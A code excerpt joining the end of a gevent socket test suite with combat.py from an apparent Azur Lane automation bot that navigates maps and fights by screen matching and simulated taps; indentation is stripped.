client = self.create_connection(**client_args)
try:
getattr(client, client_method)(data)
finally:
client.shutdown(socket.SHUT_RDWR)
client.close()
server.join()
if match_data is None:
match_data = self.long_data
self.assertEqual(read_data[0], match_data)
if server_exc_info:
six.reraise(*server_exc_info[0])
def test_sendall_str(self):
self._test_sendall(self.long_data)
if not six.PY3:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
(remote_client, _) = self.listener.accept()
# start reading, then, while reading, start writing. the reader should not hang forever
def sendall():
remote_client.sendall(b't' * N)
sender = Thread(target=sendall)
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
sender.join()
remote_client.close()
self.listener.close()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = client.makefile()
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
client.settimeout(1)
start = time.time()
self.assertRaises(self.TIMEOUT_ERROR, client.recv, 1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
acceptor.join()
client.close()
client_sock[0][0].close()
# On Windows send() accepts whatever is thrown at it
if sys.platform != 'win32':
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
_test_sendall_data = b'hello' * 1000000
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
self.assertRaises(self.TIMEOUT_ERROR, client.sendall, self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
assert 0.09 <= took <= 0.2, took
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
self.listener.close()
acceptor = Thread(target=accept_once)
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.type)
self.assertEqual(socket.SOCK_DGRAM, s.family)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.AF_INET, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, get_port()))
self.assertIsInstance(ret, errno_types)
s.close()
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', get_port()))
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
s.connect(('127.0.0.1', self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
acceptor.join()
def get_port():
tempsock = socket.socket()
tempsock.bind(('', 0))
port = tempsock.getsockname()[1]
tempsock.close()
return port
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self):
with self.assertRaises(socket.error) as cm:
socket.create_connection((greentest.DEFAULT_BIND_ADDR, get_port()),
timeout=30,
source_address=('', get_port()))
ex = cm.exception
self.assertIn('refused', str(ex).lower())
@greentest.ignores_leakcheck
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E()
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gevent.socket.timeout):
gevent.socket.wait(io(), timeout=0.01)
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
combat.py
|
import math
import string
from datetime import datetime, timedelta
from util.logger import Logger
from util.utils import Region, Utils
from scipy import spatial
from threading import Thread
class CombatModule(object):
def __init__(self, config, stats, retirement_module, enhancement_module):
"""Initializes the Combat module.
Args:
config (Config): ALAuto Config instance.
stats (Stats): ALAuto Stats instance.
retirement_module (RetirementModule): ALAuto RetirementModule instance.
enhancement_module (EnhancementModule): ALAuto EnhancementModule instance.
"""
self.enabled = True
self.config = config
self.stats = stats
self.retirement_module = retirement_module
self.enhancement_module = enhancement_module
self.chapter_map = self.config.combat['map']
Utils.small_boss_icon = config.combat['small_boss_icon']
self.exit = 0
self.combats_done = 0
self.enemies_list = []
self.mystery_nodes_list = []
self.blacklist = []
self.movement_event = {}
self.kills_count = 0
self.kills_before_boss = {
'1-1': 1, '1-2': 2, '1-3': 2, '1-4': 3,
'2-1': 2, '2-2': 3, '2-3': 3, '2-4': 3,
'3-1': 3, '3-2': 3, '3-3': 3, '3-4': 3,
'4-1': 3, '4-2': 3, '4-3': 3, '4-4': 4,
'5-1': 4, '5-2': 4, '5-3': 4, '5-4': 4,
'6-1': 4, '6-2': 4, '6-3': 4, '6-4': 5,
'7-1': 5, '7-2': 5, '7-3': 5, '7-4': 5,
'8-1': 4, '8-2': 4, '8-3': 4, '8-4': 4,
'9-1': 5, '9-2': 5, '9-3': 5, '9-4': 5,
'10-1': 6, '10-2': 6, '10-3': 6, '10-4': 6,
'11-1': 6, '11-2': 6, '11-3': 6, '11-4': 6,
'12-1': 6, '12-2': 6, '12-3': 6, '12-4': 6,
'13-1': 6, '13-2': 6, '13-3': 6, '13-4': 7
}
if self.chapter_map not in self.kills_before_boss:
# check if current map is present in the dictionary and if it isn't,
# a new entry is added with kills_before_boss value
self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
elif self.config.combat['kills_before_boss'] != 0:
# updates default value with the one provided by the user
self.kills_before_boss[self.chapter_map] = self.config.combat['kills_before_boss']
self.region = {
'fleet_lock': Region(1790, 750, 130, 30),
'open_strategy_menu': Region(1797, 617, 105, 90),
'disable_subs_hunting_radius': Region(1655, 615, 108, 108),
'close_strategy_menu': Region(1590, 615, 40, 105),
'menu_button_battle': Region(1517, 442, 209, 206),
'map_summary_go': Region(1289, 743, 280, 79),
'fleet_menu_go': Region(1485, 872, 270, 74),
'combat_ambush_evade': Region(1493, 682, 208, 56),
'combat_com_confirm': Region(848, 740, 224, 56),
'combat_end_confirm': Region(1520, 963, 216, 58),
'combat_dismiss_surface_fleet_summary': Region(790, 950, 250, 65),
'menu_combat_start': Region(1578, 921, 270, 70),
'tap_to_continue': Region(661, 840, 598, 203),
'close_info_dialog': Region(1326, 274, 35, 35),
'dismiss_ship_drop': Region(1228, 103, 692, 735),
'retreat_button': Region(1130, 985, 243, 60),
'dismiss_commission_dialog': Region(1065, 732, 235, 68),
'normal_mode_button': Region(88, 990, 80, 40),
'map_nav_right': Region(1831, 547, 26, 26),
'map_nav_left': Region(65, 547, 26, 26),
'event_button': Region(1770, 250, 75, 75),
'lock_ship_button': Region(1086, 739, 200, 55),
'clear_second_fleet': Region(1690, 473, 40, 40),
'button_switch_fleet': Region(1430, 985, 240, 60),
'menu_nav_back': Region(54, 57, 67, 67)
}
self.swipe_counter = 0
def combat_logic_wrapper(self):
"""Method that fires off the necessary child methods that encapsulates
the entire action of sortieing combat fleets and resolving combat.
Returns:
int: 1 if boss was defeated, 2 if successfully retreated after the specified
number of fights, 3 if morale is too low, 4 if dock is full and unable to
free it and 5 if fleet was defeated.
"""
self.exit = 0
self.start_time = datetime.now()
# enhancecement and retirement flags
enhancement_failed = False
retirement_failed = False
# get to map
map_region = self.reach_map()
Utils.touch_randomly(map_region)
while True:
Utils.wait_update_screen()
if self.exit == 1 or self.exit == 2:
self.stats.increment_combat_done()
time_passed = datetime.now() - self.start_time
if self.stats.combat_done % self.config.combat['retire_cycle'] == 0 or ((self.config.commissions['enabled'] or \
self.config.dorm['enabled'] or self.config.academy['enabled']) and time_passed.total_seconds() > 3600) or \
not Utils.check_oil(self.config.combat['oil_limit']):
break
else:
self.exit = 0
Logger.log_msg("Repeating map {}.".format(self.chapter_map))
Utils.touch_randomly(map_region)
continue
if self.exit > 2:
self.stats.increment_combat_attempted()
break
if Utils.find("combat/button_go", 0.93):
Logger.log_debug("Found map summary go button.")
Utils.touch_randomly(self.region["map_summary_go"])
Utils.wait_update_screen()
if Utils.find("combat/menu_fleet") and (lambda x:x > 414 and x < 584)(Utils.find("combat/menu_fleet").y) and not self.config.combat['boss_fleet']:
if not self.chapter_map[0].isdigit() and string.ascii_uppercase.index(self.chapter_map[2:3]) < 1 or self.chapter_map[0].isdigit():
Logger.log_msg("Removing second fleet from fleet selection.")
Utils.touch_randomly(self.region["clear_second_fleet"])
if Utils.find("combat/menu_select_fleet"):
Logger.log_debug("Found fleet select go button.")
Utils.touch_randomly(self.region["fleet_menu_go"])
Utils.wait_update_screen(2)
if Utils.find("combat/button_retreat"):
Logger.log_debug("Found retreat button, starting clear function.")
if not self.clear_map():
self.stats.increment_combat_attempted()
break
Utils.wait_update_screen()
if Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
continue
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
# reset enhancement flag
enhancement_failed = False
Utils.script_sleep(1)
Utils.touch_randomly(map_region)
continue
else:
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
break
if Utils.find("combat/alert_morale_low"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
break
Utils.script_sleep(1)
Utils.menu_navigate("menu/button_battle")
return self.exit
def reach_map(self):
"""
Method which returns the map region for the stage set in the configuration file.
If the map isn't found, it navigates the map selection menu to get to the world where the specified map is located.
Only works with standard maps up to worlds 13 and some event maps.
Also checks if hard mode is enabled, and if it's legit to keep it so (event maps C and D).
If nothing is found even after menu navigation, it stops the bot workflow until the user moves to the right
screen or the map asset is substituted with the right one.
Returns:
(Region): the map region of the selected stage.
"""
Utils.wait_update_screen()
# get to map selection menu
if Utils.find("menu/button_battle"):
Logger.log_debug("Found menu battle button.")
Utils.touch_randomly(self.region["menu_button_battle"])
Utils.wait_update_screen(2)
# correct map mode
if not self.chapter_map[0].isdigit():
letter = self.chapter_map[2]
event_maps = ['A', 'B', 'S', 'C', 'D']
Utils.touch_randomly(self.region['event_button'])
Utils.wait_update_screen(1)
if event_maps.index(letter) < 3 and Utils.find("menu/button_normal_mode", 0.8) or \
event_maps.index(letter) > 2 and not Utils.find("menu/button_normal_mode", 0.8):
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
else:
if Utils.find("menu/button_normal_mode"):
Logger.log_debug("Disabling hard mode.")
Utils.touch_randomly(self.region['normal_mode_button'])
Utils.wait_update_screen(1)
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
if map_region != None:
Logger.log_msg("Found specified map.")
return map_region
else:
# navigate map selection menu
if not self.chapter_map[0].isdigit():
if (self.chapter_map[2] == 'A' or self.chapter_map[2] == 'C') and \
(Utils.find('maps/map_E-B1', 0.99) or Utils.find('maps/map_E-D1', 0.99)):
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
elif (self.chapter_map[2] == 'B' or self.chapter_map[2] == 'D') and \
(Utils.find('maps/map_E-A1', 0.99) or Utils.find('maps/map_E-C1', 0.99)):
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
else:
_map = 0
for x in range(1, 14):
if Utils.find("maps/map_{}-1".format(x), 0.99):
_map = x
break
if _map != 0:
taps = int(self.chapter_map.split("-")[0]) - _map
for x in range(0, abs(taps)):
if taps >= 1:
Utils.touch_randomly(self.region['map_nav_right'])
Logger.log_debug("Swiping to the right")
Utils.script_sleep()
else:
Utils.touch_randomly(self.region['map_nav_left'])
Logger.log_debug("Swiping to the left")
Utils.script_sleep()
Utils.wait_update_screen()
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
if map_region == None:
Logger.log_error("Cannot find the specified map, please move to the world where it's located.")
while map_region == None:
map_region = Utils.find('maps/map_{}'.format(self.chapter_map), 0.99)
Utils.wait_update_screen(1)
Logger.log_msg("Found specified map.")
return map_region
def battle_handler(self, boss=False):
Logger.log_msg("Starting combat.")
# enhancecement and retirement flags
enhancement_failed = False
retirement_failed = False
while not (Utils.find("combat/menu_loading", 0.8)):
Utils.update_screen()
if Utils.find("menu/button_sort"):
if self.config.enhancement['enabled'] and not enhancement_failed:
if not self.enhancement_module.enhancement_logic_wrapper(forced=True):
enhancement_failed = True
elif self.config.retirement['enabled'] and not retirement_failed:
if not self.retirement_module.retirement_logic_wrapper(forced=True):
retirement_failed = True
else:
self.retreat_handler()
return False
elif Utils.find("combat/alert_morale_low"):
self.retreat_handler()
return False
elif Utils.find("combat/combat_pause", 0.7):
Logger.log_warning("Loading screen was not found but combat pause is present, assuming combat is initiated normally.")
break
else:
Utils.touch_randomly(self.region["menu_combat_start"])
Utils.script_sleep(1)
Utils.script_sleep(4)
# flags
in_battle = True
items_received = False
locked_ship = False
confirmed_fight = False
defeat = False
confirmed_fleet_switch = False
while True:
Utils.update_screen()
if in_battle and Utils.find("combat/combat_pause", 0.7):
Logger.log_debug("In battle.")
Utils.script_sleep(2.5)
continue
if not items_received:
if Utils.find("combat/menu_touch2continue"):
Logger.log_debug("Combat ended: tap to continue")
Utils.touch_randomly(self.region['tap_to_continue'])
in_battle = False
continue
if Utils.find("menu/item_found"):
Logger.log_debug("Combat ended: items received screen")
Utils.touch_randomly(self.region['tap_to_continue'])
Utils.script_sleep(1)
continue
if (not locked_ship) and Utils.find("combat/alert_lock"):
Logger.log_msg("Locking received ship.")
Utils.touch_randomly(self.region['lock_ship_button'])
locked_ship = True
continue
if Utils.find("menu/drop_elite"):
Logger.log_msg("Received ELITE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_rare"):
Logger.log_msg("Received new RARE ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_ssr"):
Logger.log_msg("Received SSR ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
elif Utils.find("menu/drop_common"):
Logger.log_msg("Received new COMMON ship as drop.")
Utils.touch_randomly(self.region['dismiss_ship_drop'])
Utils.script_sleep(2)
continue
if not in_battle:
if (not confirmed_fight) and Utils.find("combat/button_confirm"):
Logger.log_msg("Combat ended.")
items_received = True
confirmed_fight = True
Utils.touch_randomly(self.region["combat_end_confirm"])
if boss:
return True
Utils.wait_update_screen(3)
if (not confirmed_fight) and Utils.find("combat/commander"):
items_received = True
# prevents fleet with submarines from getting stuck at combat end screen
Utils.touch_randomly(self.region["combat_dismiss_surface_fleet_summary"])
continue
if defeat and not confirmed_fleet_switch:
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
Utils.script_sleep(3)
self.exit = 5
return False
if Utils.find("combat/alert_fleet_cannot_be_formed"):
# fleet will be automatically switched
Utils.touch_randomly(self.region['close_info_dialog'])
confirmed_fleet_switch = True
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
Utils.script_sleep(3)
continue
else:
# flagship sunk, but part of backline still remains
# proceed to retreat
Utils.script_sleep(3)
self.exit = 5
return False
if confirmed_fight and Utils.find("menu/button_confirm"):
Logger.log_msg("Found commission info message.")
Utils.touch_randomly(self.region["combat_com_confirm"])
continue
if confirmed_fight and Utils.find("combat/button_retreat"):
#Utils.touch_randomly(self.region["hide_strat_menu"])
if confirmed_fleet_switch:
# if fleet was defeated and it has now been switched
return False
else:
# fleet won the fight
self.combats_done += 1
self.kills_count += 1
if self.kills_count >= self.kills_before_boss[self.chapter_map]:
Utils.script_sleep(2.5)
return True
if confirmed_fight and Utils.find_and_touch("combat/defeat_close_button"):
Logger.log_debug("Fleet was defeated.")
defeat = True
Utils.script_sleep(3)
def movement_handler(self, target_info):
"""
Method that handles the fleet movement until it reach its target (mystery node or enemy node).
If the coordinates are wrong, they will be blacklisted and another set of coordinates to work on is obtained.
If the target is a mystery node and what is found is ammo, then the method will fall in the blacklist case
and search for another enemy: this is inefficient and should be improved, but it works.
Args:
target_info (list): coordinate_x, coordinate_y, type. Describes the selected target.
Returns:
(int): 1 if a fight is needed, otherwise 0.
"""
Logger.log_msg("Moving towards objective.")
count = 0
location = [target_info[0], target_info[1]]
Utils.script_sleep(1)
while True:
Utils.update_screen()
event = self.check_movement_threads()
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/button_evade"]:
Logger.log_msg("Ambush was found, trying to evade.")
Utils.touch_randomly(self.region["combat_ambush_evade"])
Utils.script_sleep(0.5)
continue
if (self.chapter_map[0].isdigit() and not self.config.combat['clearing_mode']) and event["combat/alert_failed_evade"]:
Logger.log_warning("Failed to evade ambush.")
self.kills_count -= 1
Utils.touch_randomly(self.region["menu_combat_start"])
self.battle_handler()
continue
if self.chapter_map[0].isdigit() and event["combat/alert_ammo_supplies"]:
Logger.log_msg("Received ammo supplies")
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if self.chapter_map[0].isdigit() and event["menu/item_found"]:
Logger.log_msg("Item found on node.")
Utils.touch_randomly(self.region['tap_to_continue'])
if Utils.find("combat/menu_emergency"):
Utils.script_sleep(1)
Utils.touch_randomly(self.region["close_strategy_menu"])
if target_info[2] == "mystery_node":
Logger.log_msg("Target reached.")
self.fleet_location = target_info[0:2]
return 0
continue
if event["menu/alert_info"]:
Logger.log_debug("Found alert.")
Utils.find_and_touch("menu/alert_close")
continue
if event["combat/menu_loading"]:
self.fleet_location = target_info[0:2]
return 1
elif event["combat/menu_formation"]:
Utils.find_and_touch("combat/auto_combat_off")
self.fleet_location = target_info[0:2]
return 1
else:
if count != 0 and count % 3 == 0:
Utils.touch(location)
if count > 21:
Logger.log_msg("Blacklisting location and searching for another enemy.")
self.blacklist.append(location[0:2])
self.fleet_location = None
location = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
count = 0
count += 1
def unable_handler(self, coords, boss=False):
"""
Method called when the path to the target (boss fleet or mystery node) is obstructed by mobs:
it procedes to switch targets to the mobs which are blocking the path.
Args:
coords (list): coordinate_x, coordinate_y. These coordinates describe the target's location.
"""
if boss:
Logger.log_debug("Unable to reach boss function started.")
else:
Logger.log_debug("Unable to reach selected target function started.")
self.blacklist.clear()
closest_to_unreachable_target = self.get_closest_target(self.blacklist, coords, boss=boss)
Utils.touch(closest_to_unreachable_target)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
Logger.log_warning("Unable to reach next to selected target.")
self.blacklist.append(closest_to_unreachable_target[0:2])
while True:
closest_enemy = self.get_closest_target(self.blacklist)
Utils.touch(closest_enemy)
Utils.update_screen()
if Utils.find("combat/alert_unable_reach"):
self.blacklist.append(closest_enemy[0:2])
else:
break
self.movement_handler(closest_enemy)
if not self.battle_handler():
return False
return True
else:
self.movement_handler(closest_to_unreachable_target)
if not self.battle_handler():
return False
return True
def retreat_handler(self):
""" Retreats if necessary.
"""
while True:
Utils.wait_update_screen(2)
if Utils.find("combat/alert_morale_low"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 3
continue
if Utils.find("menu/button_sort"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 4
continue
if Utils.find("combat/menu_formation"):
Utils.touch_randomly(self.region["menu_nav_back"])
continue
if Utils.find("combat/button_retreat"):
Utils.touch_randomly(self.region['retreat_button'])
continue
if Utils.find("menu/button_confirm"):
Utils.touch_randomly(self.region['combat_com_confirm'])
continue
if Utils.find("menu/attack"):
if self.exit != 1 and self.exit != 2 and self.exit != 5:
Logger.log_msg("Retreating...")
return
def clear_map(self):
""" Clears map.
"""
self.fleet_location = None
self.combats_done = 0
self.kills_count = 0
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.swipe_counter = 0
Logger.log_msg("Started map clear.")
Utils.script_sleep(2.5)
while Utils.find("combat/fleet_lock", 0.99):
Utils.touch_randomly(self.region["fleet_lock"])
Logger.log_warning("Fleet lock is not supported, disabling it.")
Utils.wait_update_screen()
#swipe map to fit everything on screen
swipes = {
'E-A2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-A3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-B3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'E-C2': lambda: Utils.swipe(960, 540, 960, 580, 300),
'E-C3': lambda: Utils.swipe(960, 540, 960, 500, 300),
'E-D3': lambda: Utils.swipe(1040, 640, 960, 440, 300),
'7-2': lambda: Utils.swipe(960, 540, 1300, 600, 300),
'12-2': lambda: Utils.swipe(1000, 570, 1300, 540, 300),
'12-3': lambda: Utils.swipe(1250, 530, 1300, 540, 300),
'12-4': lambda: Utils.swipe(960, 300, 960, 540, 300),
'13-1': lambda: Utils.swipe(1020, 500, 1300, 540, 300),
'13-2': lambda: Utils.swipe(1125, 550, 1300, 540, 300),
'13-3': lambda: Utils.swipe(1150, 510, 1300, 540, 300),
'13-4': lambda: Utils.swipe(1200, 450, 1300, 540, 300)
}
swipes.get(self.chapter_map, lambda: Utils.swipe(1300, 540, 960, 540, 300))()
# disable subs' hunting range
if self.config.combat["hide_subs_hunting_range"]:
Utils.script_sleep(0.5)
Utils.touch_randomly(self.region["open_strategy_menu"])
Utils.script_sleep()
Utils.touch_randomly(self.region["disable_subs_hunting_radius"])
Utils.script_sleep()
Utils.touch_randomly(self.region["close_strategy_menu"])
target_info = self.get_closest_target(self.blacklist)
while True:
Utils.update_screen()
if Utils.find("combat/alert_unable_battle"):
Utils.touch_randomly(self.region['close_info_dialog'])
self.exit = 5
if self.config.combat['retreat_after'] != 0 and self.combats_done >= self.config.combat['retreat_after']:
Logger.log_msg("Retreating after defeating {} enemies".format(self.config.combat['retreat_after']))
self.exit = 2
if self.exit != 0:
self.retreat_handler()
return True
if self.kills_count >= self.kills_before_boss[self.chapter_map] and Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9):
Logger.log_msg("Boss fleet was found.")
if self.config.combat['boss_fleet']:
s = 0
swipes = {
0: lambda: Utils.swipe(960, 240, 960, 940, 300),
1: lambda: Utils.swipe(1560, 540, 260, 540, 300),
2: lambda: Utils.swipe(960, 940, 960, 240, 300),
3: lambda: Utils.swipe(260, 540, 1560, 540, 300)
}
Utils.touch_randomly(self.region['button_switch_fleet'])
Utils.wait_update_screen(2)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
if self.chapter_map == 'E-B3' or self.chapter_map == 'E-D3':
# sometimes the fleet marker blocks the view of the boss icon
# moving the boss fleet first to the right and then to the left
# to get a clear view of the boss
counter = 1
self.fleet_location = [960, 540]
while not boss_region:
if counter % 2 != 0:
Utils.touch([self.fleet_location[0] + (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] += (counter % 5) * 200
else:
Utils.touch([self.fleet_location[0] - (counter % 5) * 200, self.fleet_location[1]])
self.fleet_location[0] -= (counter % 5) * 200
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
counter += 1
if counter == 5: counter += 1
if counter == 10:
# back to starting position
counter = 1
self.fleet_location = [960, 540]
else:
while not boss_region:
if s > 3: s = 0
swipes.get(s)()
Utils.wait_update_screen(0.5)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss")
s += 1
# swipe to center the boss fleet on the screen
# first calculate the translation vector coordinates
horizontal_translation = 150 if boss_region.x < 960 else - 150
angular_coefficient = -1 * ((540 - boss_region.y)/(960 - boss_region.x))
Utils.swipe(boss_region.x + horizontal_translation, boss_region.y + int(horizontal_translation * angular_coefficient),
960 + horizontal_translation, 540 + int(horizontal_translation * angular_coefficient), 300)
Utils.wait_update_screen()
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
while not boss_region:
# refreshing screen to deal with mist
Utils.wait_update_screen(1)
boss_region = Utils.find_in_scaling_range("enemy/fleet_boss", similarity=0.9)
#extrapolates boss_info(x,y,enemy_type) from the boss_region found
boss_info = [boss_region.x + 50, boss_region.y + 25, "boss"]
self.clear_boss(boss_info)
continue
if target_info == None:
target_info = self.get_closest_target(self.blacklist, mystery_node=(not self.config.combat["ignore_mystery_nodes"]))
if target_info:
#tap at target's coordinates
Utils.touch(target_info[0:2])
Utils.update_screen()
else:
continue
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_warning("Unable to reach the target.")
if self.config.combat['focus_on_mystery_nodes'] and target_info[2] == "mystery_node":
self.enemies_list.clear()
self.unable_handler(target_info[0:2])
else:
self.blacklist.append(target_info[0:2])
target_info = None
continue
else:
movement_result = self.movement_handler(target_info)
if movement_result == 1:
self.battle_handler()
target_info = None
self.blacklist.clear()
continue
def clear_boss(self, boss_info):
Logger.log_debug("Started boss function.")
self.enemies_list.clear()
self.mystery_nodes_list.clear()
self.blacklist.clear()
self.fleet_location = None
while True:
#tap at boss' coordinates
Utils.touch(boss_info[0:2])
Utils.update_screen()
if Utils.find("combat/alert_unable_reach", 0.8):
Logger.log_msg("Unable to reach boss.")
#handle boss' coordinates
if not self.unable_handler(boss_info[0:2], boss=True):
return
continue
else:
self.movement_handler(boss_info)
if self.battle_handler(boss=True):
self.exit = 1
Logger.log_msg("Boss successfully defeated.")
Utils.script_sleep(3)
return
def get_enemies(self, blacklist=[], boss=False):
